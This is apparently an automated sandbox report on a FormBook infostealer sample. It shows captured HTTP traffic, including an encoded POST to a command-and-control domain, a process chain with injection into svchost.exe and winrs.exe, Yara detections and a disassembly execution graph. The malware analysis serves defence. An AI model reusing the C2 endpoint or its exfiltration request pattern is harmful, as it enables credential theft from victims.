                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Nov 20, 2024 09:25:33.612343073 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2MxZDY0ZjgtMTYyNC00M2NlLTkwN2ItZjNhMzM1NDg0MmZkIiwicGFnZV90aW1lIjoxNzMyMDkxMT


                                                                      Session ID: 43 | Source IP: 192.168.2.10 | Source Port: 50019 | Destination IP: 199.59.243.227 | Destination Port: 80
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:25:36.940895081 CET | 1814 | OUT | POST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 59 2b 53 45 4b 4e 2b 33 31 42 34 58 37 33 54 45 64 2b 32 79 6c 46 47 74 7a 6e 57 4c 4c 56 48 54 50 53 43 56 6c 70 2f 66 45 5a 57 2f 77 58 72 32 2f 64 2b 76 75 54 38 4a 32 4d 67 68 56 62 2b 78 55 72 31 58 34 54 35 4a 2f 47 4f 38 61 61 4d 54 56 5a 6a 75 6a 54 50 62 6c 4c 4c 49 53 63 55 48 51 67 64 71 46 4b 5a 6f 43 78 53 39 73 70 36 31 38 4c 43 45 61 6e 62 6d 2f 6a 43 5a 78 68 38 33 69 54 32 37 43 52 31 47 61 4c 33 42 73 65 68 79 50 7a 66 49 6c 32 61 6a 48 59 62 71 57 4f 78 34 45 44 77 44 48 31 54 6f 74 37 36 79 4e 79 66 6f 45 6c 37 4d 46 7a 68 72 56 75 36 65 6b 56 64 61 57 54 67 30 51 34 77 46 69 66 63 4b 7a 2b 31 7a 4f 37 78 72 2f 55 76 68 4b 34 43 6b 76 38 67 5a 6b 52 2b 76 68 48 39 35 6c 5a 6e 61 68 64 44 6c 43 71 59 42 4f 72 75 63 62 34 45 50 33 76 4a 67 2f 69 39 5a 41 50 39 64 54 5a 45 57 58 48 58 77 75 5a 46 7a 65 34 42 57 30 52 45 4d 64 55 56 75 45 6d 44 63 79 75 45 51 72 75 32 6c 76 4b 68 4e 42 66 6b 64 6a 77 6d 63 66 58 77 44 55 4c 44 67 62 [TRUNCATED]
                                                                      Data Ascii: prh4=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 [TRUNCATED]
                                                                      Nov 20, 2024 09:25:37.379458904 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Wed, 20 Nov 2024 08:25:37 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: 95025827-d181-4643-bba4-95ae9fdbddd9
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=95025827-d181-4643-bba4-95ae9fdbddd9; expires=Wed, 20 Nov 2024 08:40:37 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Nov 20, 2024 09:25:37.379492998 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTUwMjU4MjctZDE4MS00NjQzLWJiYTQtOTVhZTlmZGJkZGQ5IiwicGFnZV90aW1lIjoxNzMyMDkxMT


                                                                      Target ID:0
                                                                      Start time:03:22:28
                                                                      Start date:20/11/2024
                                                                      Path:C:\Users\user\Desktop\A2028041200SD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\A2028041200SD.exe"
                                                                      Imagebase:0x8f0000
                                                                      File size:1'214'464 bytes
                                                                      MD5 hash:65A28CDDB97884A94A7C9FAEF74300C3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:03:22:30
                                                                      Start date:20/11/2024
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\A2028041200SD.exe"
                                                                      Imagebase:0x100000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:03:22:33
                                                                      Start date:20/11/2024
                                                                      Path:C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe"
                                                                      Imagebase:0xa80000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:03:22:35
                                                                      Start date:20/11/2024
                                                                      Path:C:\Windows\SysWOW64\winrs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                      Imagebase:0xa60000
                                                                      File size:43'008 bytes
                                                                      MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:03:23:01
                                                                      Start date:20/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff613480000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                        Execution Graph

                                                                        Execution Coverage:4.3%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:7.9%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:68
execution_graph
90f4ea 48 API calls 88373->88377 88376 8fb66c CharUpperBuffW 88375->88376 88376->88362 88377->88357 88378->87568 88380 90f4ea 48 API calls 88379->88380 88381 8f6b34 88380->88381 88382 8f6b4a 48 API calls 88381->88382 88383 8f6b43 88382->88383 88383->88362 88384->88362 88386 8fbb9b 88385->88386 88389 8fbb96 ___crtGetEnvironmentStringsW 88385->88389 88387 90ee75 48 API calls 88386->88387 88388 961b77 88386->88388 88387->88389 88388->88388 88389->88362 88390->88362 88392 8fbb25 88391->88392 88397 8fba98 ___crtGetEnvironmentStringsW 88391->88397 88394 90f4ea 48 API calls 88392->88394 88393 90f4ea 48 API calls 88395 8fba9f 88393->88395 88394->88397 88396 8fbac8 88395->88396 88398 90f4ea 48 API calls 88395->88398 88396->88354 88397->88393 88398->88396 88399->88362 88400->88362 88402 90f4ea 48 API calls 88401->88402 88403 8f6b54 88402->88403 88403->88373 88404->88367 88405->88366 88406->88367 88408 936529 88407->88408 88409 936cc4 FindFirstFileW 88407->88409 88408->87402 88409->88408 88410 936cd9 FindClose 88409->88410 88410->88408 88411->87595 88412->87578 88413->87585 88414->87590 88415->87593 88416->87605 88417->87607 88418->87611 88419->87468 88420->87468 88421->87467 88422->87467 88423->87460 88424->87455 88425->87466 88426->87286 88427->87286 88428->87287 88429->87296 88430->87301 88431 969bec 88468 900ae0 Mailbox ___crtGetEnvironmentStringsW 88431->88468 88435 900509 88526 93cc5c 87 API calls 4 library calls 88435->88526 88436 90146e 88446 8f6eed 48 API calls 88436->88446 88439 90f4ea 48 API calls 88457 8ffec8 88439->88457 88440 8f6eed 48 API calls 88440->88457 88443 96a246 88447 8f6eed 48 API calls 88443->88447 88444 96a922 88445 901473 88525 93cc5c 87 API calls 4 library calls 88445->88525 88461 8fffe1 Mailbox 88446->88461 88447->88461 88450 8fd7f7 48 API calls 88450->88457 88451 96a873 88452 96a30e 88452->88461 88521 9297ed InterlockedDecrement 88452->88521 88453 910f0a 52 API calls __cinit 88453->88457 88454 8fce19 48 API calls 88454->88468 88455 9297ed 
InterlockedDecrement 88455->88457 88457->88435 88457->88436 88457->88439 88457->88440 88457->88443 88457->88445 88457->88450 88457->88452 88457->88453 88457->88455 88458 96a973 88457->88458 88457->88461 88462 9015b5 88457->88462 88518 901820 332 API calls 2 library calls 88457->88518 88519 901d10 59 API calls Mailbox 88457->88519 88527 93cc5c 87 API calls 4 library calls 88458->88527 88460 96a982 88524 93cc5c 87 API calls 4 library calls 88462->88524 88463 94e822 332 API calls 88463->88468 88464 90f4ea 48 API calls 88464->88468 88465 8ffe30 332 API calls 88465->88468 88466 96a706 88522 93cc5c 87 API calls 4 library calls 88466->88522 88468->88454 88468->88457 88468->88461 88468->88463 88468->88464 88468->88465 88468->88466 88469 901526 Mailbox 88468->88469 88470 9297ed InterlockedDecrement 88468->88470 88471 946ff0 332 API calls 88468->88471 88474 950d1d 88468->88474 88477 950d09 88468->88477 88480 94f0ac 88468->88480 88512 93a6ef 88468->88512 88520 94ef61 83 API calls 2 library calls 88468->88520 88523 93cc5c 87 API calls 4 library calls 88469->88523 88470->88468 88471->88468 88528 94f8ae 88474->88528 88476 950d2d 88476->88468 88478 94f8ae 130 API calls 88477->88478 88479 950d19 88478->88479 88479->88468 88481 8fd7f7 48 API calls 88480->88481 88482 94f0c0 88481->88482 88483 8fd7f7 48 API calls 88482->88483 88484 94f0c8 88483->88484 88485 8fd7f7 48 API calls 88484->88485 88486 94f0d0 88485->88486 88487 8f936c 82 API calls 88486->88487 88489 94f0de 88487->88489 88488 94f2f9 Mailbox 88488->88468 88489->88488 88490 8f6a63 48 API calls 88489->88490 88491 8fc799 48 API calls 88489->88491 88492 94f2cc 88489->88492 88493 94f2b3 88489->88493 88496 94f2ce 88489->88496 88499 8f6eed 48 API calls 88489->88499 88502 8fbdfa 48 API calls 88489->88502 88504 8fbdfa 48 API calls 88489->88504 88509 8f936c 82 API calls 88489->88509 88510 8f518c 48 API calls 88489->88510 88511 8f510d 48 API calls 88489->88511 88490->88489 88491->88489 88492->88488 88666 8f6b68 48 API calls 88492->88666 
88647 8f518c 88493->88647 88498 8f518c 48 API calls 88496->88498 88501 94f2dd 88498->88501 88499->88489 88503 8f510d 48 API calls 88501->88503 88505 94f175 CharUpperBuffW 88502->88505 88503->88492 88507 94f23a CharUpperBuffW 88504->88507 88506 8fd645 53 API calls 88505->88506 88506->88489 88646 90d922 55 API calls 2 library calls 88507->88646 88509->88489 88510->88489 88511->88489 88513 93a6fb 88512->88513 88514 90f4ea 48 API calls 88513->88514 88515 93a709 88514->88515 88516 8fd7f7 48 API calls 88515->88516 88517 93a717 88515->88517 88516->88517 88517->88468 88518->88457 88519->88457 88520->88468 88521->88461 88522->88469 88523->88461 88524->88461 88525->88451 88526->88444 88527->88460 88529 8f936c 82 API calls 88528->88529 88530 94f8ea 88529->88530 88552 94f92c Mailbox 88530->88552 88564 950567 88530->88564 88532 94fb8b 88533 94fcfa 88532->88533 88537 94fb95 88532->88537 88623 950688 90 API calls Mailbox 88533->88623 88536 94fd07 88536->88537 88538 94fd13 88536->88538 88577 94f70a 88537->88577 88538->88552 88539 8f936c 82 API calls 88558 94f984 Mailbox 88539->88558 88544 94fbc9 88591 90ed18 88544->88591 88547 94fbe3 88621 93cc5c 87 API calls 4 library calls 88547->88621 88548 94fbfd 88595 90c050 88548->88595 88551 94fbee GetCurrentProcess TerminateProcess 88551->88548 88552->88476 88553 94fc14 88554 901b90 48 API calls 88553->88554 88563 94fc3e 88553->88563 88556 94fc2d 88554->88556 88555 94fd65 88555->88552 88560 94fd7e FreeLibrary 88555->88560 88559 95040f 106 API calls 88556->88559 88557 901b90 48 API calls 88557->88563 88558->88532 88558->88539 88558->88552 88558->88558 88619 9529e8 48 API calls ___crtGetEnvironmentStringsW 88558->88619 88620 94fda5 60 API calls 2 library calls 88558->88620 88559->88563 88560->88552 88563->88555 88563->88557 88606 95040f 88563->88606 88622 8fdcae 50 API calls Mailbox 88563->88622 88565 8fbdfa 48 API calls 88564->88565 88566 950582 CharLowerBuffW 88565->88566 88624 931f11 88566->88624 88570 8fd7f7 48 API calls 88571 9505bb 
88570->88571 88631 8f69e9 48 API calls ___crtGetEnvironmentStringsW 88571->88631 88573 9505d2 88632 8fb18b 88573->88632 88574 95061a Mailbox 88574->88558 88576 9505de Mailbox 88576->88574 88636 94fda5 60 API calls 2 library calls 88576->88636 88578 94f725 88577->88578 88582 94f77a 88577->88582 88579 90f4ea 48 API calls 88578->88579 88581 94f747 88579->88581 88580 90f4ea 48 API calls 88580->88581 88581->88580 88581->88582 88583 950828 88582->88583 88584 950a53 Mailbox 88583->88584 88587 95084b _strcat _wcscpy __NMSG_WRITE 88583->88587 88584->88544 88585 8fd286 48 API calls 88585->88587 88586 8fcf93 58 API calls 88586->88587 88587->88584 88587->88585 88587->88586 88588 8f936c 82 API calls 88587->88588 88589 91395c 47 API calls std::exception::_Copy_str 88587->88589 88639 938035 50 API calls __NMSG_WRITE 88587->88639 88588->88587 88589->88587 88593 90ed2d 88591->88593 88592 90edc5 VirtualProtect 88594 90ed93 88592->88594 88593->88592 88593->88594 88594->88547 88594->88548 88596 90c064 88595->88596 88598 90c069 Mailbox 88595->88598 88640 90c1af 48 API calls 88596->88640 88604 90c077 88598->88604 88641 90c15c 48 API calls 88598->88641 88600 90f4ea 48 API calls 88602 90c108 88600->88602 88601 90c152 88601->88553 88603 90f4ea 48 API calls 88602->88603 88605 90c113 88603->88605 88604->88600 88604->88601 88605->88553 88605->88605 88607 950427 88606->88607 88616 950443 88606->88616 88608 95044f 88607->88608 88609 95042e 88607->88609 88610 9504f8 88607->88610 88607->88616 88644 8fcdb9 48 API calls 88608->88644 88642 937c56 50 API calls _strlen 88609->88642 88645 939dc5 104 API calls 88610->88645 88611 95051e 88611->88563 88614 911c9d _free 47 API calls 88614->88611 88616->88611 88616->88614 88617 950438 88643 8fcdb9 48 API calls 88617->88643 88619->88558 88620->88558 88621->88551 88622->88563 88623->88536 88625 931f3b __NMSG_WRITE 88624->88625 88626 931f79 88625->88626 88627 931f6f 88625->88627 88629 931ffa 88625->88629 88626->88570 88626->88576 88627->88626 88637 90d37a 60 
API calls 88627->88637 88629->88626 88638 90d37a 60 API calls 88629->88638 88631->88573 88633 8fb1a2 ___crtGetEnvironmentStringsW 88632->88633 88634 8fb199 88632->88634 88633->88576 88634->88633 88635 8fbdfa 48 API calls 88634->88635 88635->88633 88636->88574 88637->88627 88638->88629 88639->88587 88640->88598 88641->88604 88642->88617 88643->88616 88644->88616 88645->88616 88646->88489 88648 8f5197 88647->88648 88649 8f519f 88648->88649 88650 961ace 88648->88650 88667 8f5130 88649->88667 88652 8f6b4a 48 API calls 88650->88652 88654 961adb __NMSG_WRITE 88652->88654 88653 8f51aa 88657 8f510d 88653->88657 88655 90ee75 48 API calls 88654->88655 88656 961b07 ___crtGetEnvironmentStringsW 88655->88656 88658 8f511f 88657->88658 88659 961be7 88657->88659 88677 8fb384 88658->88677 88686 92a58f 48 API calls ___crtGetEnvironmentStringsW 88659->88686 88662 8f512b 88662->88492 88663 961bf1 88664 8f6eed 48 API calls 88663->88664 88665 961bf9 Mailbox 88664->88665 88666->88488 88668 8f513f __NMSG_WRITE 88667->88668 88669 961b27 88668->88669 88670 8f5151 88668->88670 88671 8f6b4a 48 API calls 88669->88671 88672 8fbb85 48 API calls 88670->88672 88673 961b34 88671->88673 88674 8f515e ___crtGetEnvironmentStringsW 88672->88674 88675 90ee75 48 API calls 88673->88675 88674->88653 88676 961b57 ___crtGetEnvironmentStringsW 88675->88676 88678 8fb392 88677->88678 88679 8fb3c5 ___crtGetEnvironmentStringsW 88677->88679 88678->88679 88680 8fb3fd 88678->88680 88681 8fb3b8 88678->88681 88679->88662 88679->88679 88682 90f4ea 48 API calls 88680->88682 88683 8fbb85 48 API calls 88681->88683 88684 8fb407 88682->88684 88683->88679 88685 90f4ea 48 API calls 88684->88685 88685->88679 88686->88663 88687 9619dd 88692 8f4a30 88687->88692 88689 9619f1 88712 910f0a 52 API calls __cinit 88689->88712 88691 9619fb 88693 8f4a40 __ftell_nolock 88692->88693 88694 8fd7f7 48 API calls 88693->88694 88695 8f4af6 88694->88695 88713 8f5374 88695->88713 88697 8f4aff 88720 8f363c 88697->88720 88700 8f518c 48 API calls 
88701 8f4b18 88700->88701 88726 8f64cf 88701->88726 88704 8fd7f7 48 API calls 88705 8f4b32 88704->88705 88732 8f49fb 88705->88732 88707 8f4b43 Mailbox 88707->88689 88708 8fce19 48 API calls 88710 8f4b3d _wcscat Mailbox __NMSG_WRITE 88708->88710 88709 8f64cf 48 API calls 88709->88710 88710->88707 88710->88708 88710->88709 88711 8f61a6 48 API calls 88710->88711 88711->88710 88712->88691 88746 91f8a0 88713->88746 88716 8fce19 48 API calls 88717 8f53a7 88716->88717 88748 8f660f 88717->88748 88719 8f53b1 Mailbox 88719->88697 88721 8f3649 __ftell_nolock 88720->88721 88771 8f366c GetFullPathNameW 88721->88771 88723 8f365a 88724 8f6a63 48 API calls 88723->88724 88725 8f3669 88724->88725 88725->88700 88727 8f651b 88726->88727 88731 8f64dd ___crtGetEnvironmentStringsW 88726->88731 88730 90f4ea 48 API calls 88727->88730 88728 90f4ea 48 API calls 88729 8f4b29 88728->88729 88729->88704 88730->88731 88731->88728 88773 8fbcce 88732->88773 88735 8f4a2b 88735->88710 88736 9641cc RegQueryValueExW 88737 964246 RegCloseKey 88736->88737 88738 9641e5 88736->88738 88739 90f4ea 48 API calls 88738->88739 88740 9641fe 88739->88740 88741 8f47b7 48 API calls 88740->88741 88742 964208 RegQueryValueExW 88741->88742 88743 964224 88742->88743 88744 96423b 88742->88744 88745 8f6a63 48 API calls 88743->88745 88744->88737 88745->88744 88747 8f5381 GetModuleFileNameW 88746->88747 88747->88716 88749 91f8a0 __ftell_nolock 88748->88749 88750 8f661c GetFullPathNameW 88749->88750 88755 8f6a63 88750->88755 88752 8f6643 88766 8f6571 88752->88766 88756 8f6adf 88755->88756 88759 8f6a6f __NMSG_WRITE 88755->88759 88757 8fb18b 48 API calls 88756->88757 88758 8f6ab6 ___crtGetEnvironmentStringsW 88757->88758 88758->88752 88760 8f6a8b 88759->88760 88761 8f6ad7 88759->88761 88762 8f6b4a 48 API calls 88760->88762 88770 8fc369 48 API calls 88761->88770 88764 8f6a95 88762->88764 88765 90ee75 48 API calls 88764->88765 88765->88758 88767 8f657f 88766->88767 88768 8fb18b 48 API calls 88767->88768 88769 8f658f 88768->88769 
88769->88719 88770->88758 88772 8f368a 88771->88772 88772->88723 88774 8fbce8 88773->88774 88778 8f4a0a RegOpenKeyExW 88773->88778 88775 90f4ea 48 API calls 88774->88775 88776 8fbcf2 88775->88776 88777 90ee75 48 API calls 88776->88777 88777->88778 88778->88735 88778->88736 88779 9619ba 88784 90c75a 88779->88784 88783 9619c9 88785 8fd7f7 48 API calls 88784->88785 88786 90c7c8 88785->88786 88792 90d26c 88786->88792 88789 90c865 88790 90c881 88789->88790 88795 90d1fa 48 API calls ___crtGetEnvironmentStringsW 88789->88795 88791 910f0a 52 API calls __cinit 88790->88791 88791->88783 88796 90d298 88792->88796 88795->88789 88797 90d28b 88796->88797 88798 90d2a5 88796->88798 88797->88789 88798->88797 88799 90d2ac RegOpenKeyExW 88798->88799 88799->88797 88800 90d2c6 RegQueryValueExW 88799->88800 88801 90d2e7 88800->88801 88802 90d2fc RegCloseKey 88800->88802 88801->88802 88802->88797 88803 915dfd 88804 915e09 _wprintf 88803->88804 88840 917eeb GetStartupInfoW 88804->88840 88806 915e0e 88842 919ca7 GetProcessHeap 88806->88842 88808 915e66 88809 915e71 88808->88809 88927 915f4d 47 API calls 3 library calls 88808->88927 88843 917b47 88809->88843 88812 915e77 88813 915e82 __RTC_Initialize 88812->88813 88928 915f4d 47 API calls 3 library calls 88812->88928 88864 91acb3 88813->88864 88816 915e91 88817 915e9d GetCommandLineW 88816->88817 88929 915f4d 47 API calls 3 library calls 88816->88929 88883 922e7d GetEnvironmentStringsW 88817->88883 88820 915e9c 88820->88817 88824 915ec2 88896 922cb4 88824->88896 88827 915ec8 88828 915ed3 88827->88828 88931 91115b 47 API calls 3 library calls 88827->88931 88910 911195 88828->88910 88831 915edb 88832 915ee6 __wwincmdln 88831->88832 88932 91115b 47 API calls 3 library calls 88831->88932 88914 8f3a0f 88832->88914 88835 915efa 88836 915f09 88835->88836 88933 9113f1 47 API calls _doexit 88835->88933 88934 911186 47 API calls _doexit 88836->88934 88839 915f0e _wprintf 88841 917f01 88840->88841 88841->88806 88842->88808 88935 91123a 30 API calls 2 
